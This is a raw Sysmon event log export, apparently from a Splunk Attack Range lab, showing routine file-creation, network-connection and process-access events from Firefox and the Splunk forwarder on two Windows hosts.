07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2AE580C1A54212F4F1DEBCE5F0E04595,SHA256=5C1E29C72FB2119E0B3D60F6EBA81C13025D0979323C70FF247CEA83FC110227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8148E9DDDC562582A7B27363E4BDEEEA,SHA256=9AB615C4F44FB6B4089FA1522F7F02EC85B1288AC6C2A2BA839F0AE8B45BCE8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=636462C7D302AFDF0A6E01A7AA058DBA,SHA256=B33AF5AC94FC03220D8154FC11290DA445FBDDED85EEF51D149E4F590DFFBF94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047838Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=849D36216C6583BBA2E5F8C3BEFD1459,SHA256=142E58411AB4A16BCD0515F6214A568950FB551B7AA25A8C86A1924C9DCE3BDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047837Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6E319A8D75B49FDE65488F08793FD5D5,SHA256=29BBF2A2D2BDF879672BE71ED34A1433EC930C3BE2E63A430C8C6605734F2791,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047836Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=61446A74DEDA75FDB9E025A51419CDC6,SHA256=6AA904B6E6C113957DB5E1EB8C367E39F6587C3EAD8C652C91FC137D8F9C8842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047835Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=87F542A1B42B2985E28CD976B0BA040B,SHA256=ADA3E96180A343CC31125A1954BD665625A9C4D13C39771CCECEC0F8372010A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047834Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=039A0F36D4F7B7D7EBA6338C9621CF5E,SHA256=E638538C65519E2E922DCDA5DBFEC2817A2CFDD5166A82C8AF6F07DF7B9BC9E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5AF2413F3E8E39466328CC0D81A95A7F,SHA256=D9B7002B41E88D3D94061BB712A22675E9F1E451ADB771B95B40B2C8D55B846C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=49ACDB2023BFC15EF05D4EF83BFE5902,SHA256=D6E4F617273082126836D662E3A637F046C7E0FCD4D62C660DA787323C0716F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:38.024{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1ED45DCB030D32BDAF5D1C37B9C80669,SHA256=A885FD3A33BF50A71890F7009D82531576CF39509F7A7F99B58E0611627181E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:39.938{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=246316C78EE7932F17EFA2DB8B6DA421,SHA256=45BEE2481D7C874239D5D118856E5751C0E38FE9E0C12BACEAB6EC3554928716,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:31.589{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50989-false10.0.1.12-8000- 23542300x80000000000000001047844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:39.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7D0705FA9057FA15B03C10AB4DB7A39,SHA256=5FA740479B2EFD8AFC1D470536B811C4D73E778C65D27C22BC34CD136212C402,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:40.954{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EDD7D908DA2D5744DAC86492BE51F2F,SHA256=0EC9CBBC9F94E371A9D64E29158854920704BF59764DE67B070B0F694BA0BC34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:40.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28137969FB34E13DE4529A8494E46D66,SHA256=68962ACEEFACD23E9EB87B59573B758AB38C6C75E7775985F30BC7DD1F3EAFF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:41.970{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A8A1CE9371A410355F42448A016028D,SHA256=6E568BEE4F10B6DCE32E62B900476B7892C6B7D27198F327F99BBC0481588731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:41.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=091F2C282B834ED2FE7CBF4D2D1476EE,SHA256=0DCFF468258CBDC8483C4E81AD77442AC28C0E71C39DC639B693E903D05DE8EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:42.985{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C65B022BBC192054D0FAD63C3525C023,SHA256=76C0CE8657A14FA312FCE4DC269DE38F4FCAB3195E4A109A2FCAC21A57276817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:42.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33CA4190F358BD7189A08EDB9048D1B,SHA256=1A1F7AFA6DAA2F16267A154987668158281850779DAB04DDB50A444767EA06BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:43.400{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DC145555A5ECA681DA52A4DB2242CF0,SHA256=FAEDFBA5234A3EFA631FC1A381244D7DEB7F498915265C5D41CBB9F29677FC97,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:36.748{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50990-false10.0.1.12-8000- 23542300x80000000000000001047852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E8474B86A95E9B62631908ACA82FD41,SHA256=8E47E2324CEF1B046FB66F745E975B9447A3A6A23567D415B568CCB41BAA05DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:43.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57231-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:44.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D13C76E2177F0154210D2A6878DE5738,SHA256=187B30F1BFD06C22A1535E1EBB67ADB1B9D3A05B7EE09524169E4E2C4ACF5413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.402{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=71CAD346828D8FC4430FE3D1E1023B9C,SHA256=92CED77414B02D147A8DF9AF9E06AE42171D940E6BE152AF619631097D8D4294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:44.401{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3F80ABD4E8703E0C8A7E7BBE5DFDC5F,SHA256=0A8C2A9023791A2C6343CA2DE643F69D2D668D83A5A0B9D3CFF05B6EDDF9B2C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:45.466{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08A697747F3784E7C64EE5AAAEDD88E2,SHA256=8AEFB76BA91E05EDA3B4481CA75DA517C07E7CB47D50CD8CD80FBFCE748280BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:45.021{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=693BA822C4831C715BF0074051D467DA,SHA256=1843373B80EF99083185999744C1FF846003D9F6920AE61DB4E09673EE6E8416,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:46.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B737D6DDBD21A221DEF79C263282F73E,SHA256=B649580956ADC54802CED8A5A9ED2FE5DBA40D174151FEB2A4BEC5BB7B900D69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:46.053{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=461A784AB19E1A9648525AEE5613691E,SHA256=954CD0C702C8F84AECAE2C8C31A7FE3300B541394838C608F6FDB3FC0038616B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:47.517{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBAC2529290AB332C6033EA50D93D8B9,SHA256=E0BAD4433ECDB8D6DD97177756E4397EA91C578A26AB900810057B801AD1A18E,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000807118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:47.069{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB7671F656C96BF408F1946A1B5772C,SHA256=C656DFFED828B6E080DDD7E3DA03BE1444BC110C98C676C2A7E3712407486C87,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:48.532{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05864C2906FAA51FAD4AC1EB0AC6F394,SHA256=55D24A7D16A353A3C128E137AF926D192505E03DEDC472ADE9AD2C8B6B720998,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:48.147{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88CFE70B7B7F0FDF10C22BB80940E926,SHA256=7C3C615FE5639D82FD6E9E001A9871D817F01556AC951B82CEFC9F30F64B7373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:49.546{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=230443D21F200450502FC164E7A547A3,SHA256=620D06F209A37D08F854EA1B092062C8ECCB5B360663136EEF04CF3C210FFFF2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:48.342{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57232-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:49.163{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC957B3354F9E0F8839DD99AB924C9A3,SHA256=B58C7F4C70F67889A8945EB74127836E8DD262052A3B37262141B335AE2AC024,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:42.664{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50991-false10.0.1.12-8000- 10341000x80000000000000001047877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.947{466BC892-F41E-60EB-167D-00000000CF01}98888812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:50.747{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F41E-60EB-167D-00000000CF01}9888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:50.747{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 